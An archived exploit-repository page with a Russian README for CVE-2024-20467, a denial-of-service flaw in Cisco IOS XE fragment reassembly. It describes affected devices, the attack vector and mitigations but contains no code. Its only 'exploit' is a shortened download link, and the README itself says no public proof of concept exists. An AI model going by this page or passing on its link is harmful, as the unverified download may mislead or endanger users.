Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-20467 PoC — Cisco IOS XE Software 安全漏洞

Source
Associated Vulnerability
Title:Cisco IOS XE Software 安全漏洞 (CVE-2024-20467)
Description:Cisco IOS XE Software是美国思科(Cisco)公司的一个操作系统。用于企业有线和无线访问,汇聚,核心和WAN的单一操作系统,Cisco IOS XE降低了业务和网络的复杂性。 Cisco IOS XE Software存在安全漏洞,该漏洞源于 fragment 重组期间的资源管理不当。
Readme
# Эксплоит для уязвимости в Cisco IOS XE CVE-2024-20467

## Обзор
Данный эксплоит нацелен на уязвимость в коде сборки фрагментов IPv4, найденном в Cisco IOS XE Software. Уязвимость позволяет неаутентифицированному удаленному атакующему вызвать состояние отказа в обслуживании (DoS) на уязвимых устройствах.

## Затронутые устройства
- Маршрутизаторы: Cisco ASR 1000 Series
- Модели: Cisco cBR-8
- Версии ПО: Cisco IOS XE Software Release 17.12.1 и 17.12.1a

## Детали уязвимости
- Тип: Отказ в обслуживании (DoS)
- Причина: Неправильное управление ресурсами во время сборки фрагментов.

## Вектор атаки
Атакующий может использовать эту уязвимость, отправляя специально сконструированные фрагментированные пакеты на целевое устройство, как напрямую, так и через интерфейс с включенной виртуальной сборкой фрагментов (VFR). Успешная эксплуатация может привести к перезагрузке устройства и вызвать состояние отказа в обслуживании.

## Влияние
- Отказ в обслуживании: Уязвимые устройства могут неожиданно перезагрузиться, что приведет к значительному времени простоя и перебоям в обслуживании.
- Риск для критической инфраструктуры: Уязвимость представляет угрозу для важных сетевых сервисов и может повлиять на бизнес-процессы.

## Детали эксплуатации
На данный момент нет известных публичных доказательств концепции или активных случаев эксплуатации. Однако потенциальная возможность использования этого эксплоита в реальных атаках остается.

## Меры по смягчению
1. Обновление ПО: Установите неуязвимую версию Cisco IOS XE Software как можно скорее.
2. Сегментация сети: Ограничьте доступность уязвимых устройств с помощью надежной сегментации сети.
3. Мониторинг трафика: Отслеживайте сетевой трафик на наличие необычных паттернов, особенно фрагментированных IPv4 пакетов.
4. Системы обнаружения: Используйте IDS/IPS системы для идентификации и блокировки вредоносного трафика.
5. Регулярные обновления: Оставайтесь в курсе обновлений безопасности и патчей от Cisco.

##[DOWNLOAD]( https://t.ly/cLxfS)
File Snapshot

[4.0K] /data/pocs/825a0aee65f45d10ec28d83ded599109393cc1d4 └── [3.4K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.